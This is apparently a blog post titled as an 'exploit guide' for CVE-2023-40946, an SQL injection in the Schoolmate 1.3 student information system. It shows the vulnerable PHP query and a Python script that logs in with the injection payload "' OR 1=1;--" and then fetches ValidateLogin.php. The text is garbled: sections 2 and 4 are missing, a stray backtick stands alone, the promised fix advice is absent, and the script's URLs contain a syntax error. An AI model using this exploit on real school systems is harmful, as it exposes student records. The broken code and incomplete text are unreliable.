CVE-2023-40946 - Schoolmate 1.3’s SQL Injection – Deep Dive and Exploit Guide

Schoolmate is a simple PHP-based student information system used by schools around the world. In this article, we’ll uncover a serious security flaw in Schoolmate version 1.3, identified as CVE-2023-40946. This vulnerability is an SQL Injection that affects the $username variable sourced from a PHP session in the ValidateLogin.php script. We’ll walk through where the problem lies, demonstrate how it can be exploited, and share advice on how to fix it.

---

1. What’s the Problem?

Schoolmate 1.3 uses a login mechanism in ValidateLogin.php. After login, the $username is stored in a session variable. This session variable is later used directly inside an SQL query without any sanitization or escaping. That’s exactly where the SQL Injection happens.

Let's look at the relevant portion from ValidateLogin.php

<?php
session_start();
$username = $_SESSION['username'];
$query = "SELECT * FROM users WHERE username='$username'";
$result = mysql_query($query);
?>

Notice: The value of $username from the session is placed straight into the SQL query and sent for execution. If someone manages to poison the session variable (through a separate flaw, or even during login if inputs aren't cleaned), it can allow arbitrary SQL to be run!

---

`

Normally, the login system should validate and clean this, but in Schoolmate 1.3, the input just gets stored in the session.

Trigger the Vulnerable Query

Each time ValidateLogin.php runs, it pulls the unchanged value from the session and builds the vulnerable SQL.

Here’s a simplified Python script that mimics the attack using http requests and session handling

import requests

s = requests.Session()

# Step 1: Login with a malicious username
payload = "' OR 1=1;--"
data = {
    "username": payload,
    "password": "fakepassword"
}
s.post("http://schoolmate.example.com/login.php";, data=data)

# Step 2: Access the vulnerable page
resp = s.get("http://schoolmate.example.com/ValidateLogin.php";)
print(resp.text)

3. Original References

- CVE-2023-40946 detail at NVD
- Schoolmate source code (archived)
- OWASP SQL Injection Exploit Guide
- Full exploit disclosure by Security Researcher (PacketStorm)

5. Summary

SQL Injection in Schoolmate 1.3 (CVE-2023-40946) is serious. Exploiting the $username variable from session lets attackers run arbitrary SQL, break into student records, and cause havoc. If you run Schoolmate, fix this today to protect your school and your students.

Stay safe and keep your code secure!

*Written by: SecurityTechCorner*
*Date: June 2024*

Timeline

Published on: 09/11/2023 20:15:10 UTC
Last modified on: 09/13/2023 03:49:05 UTC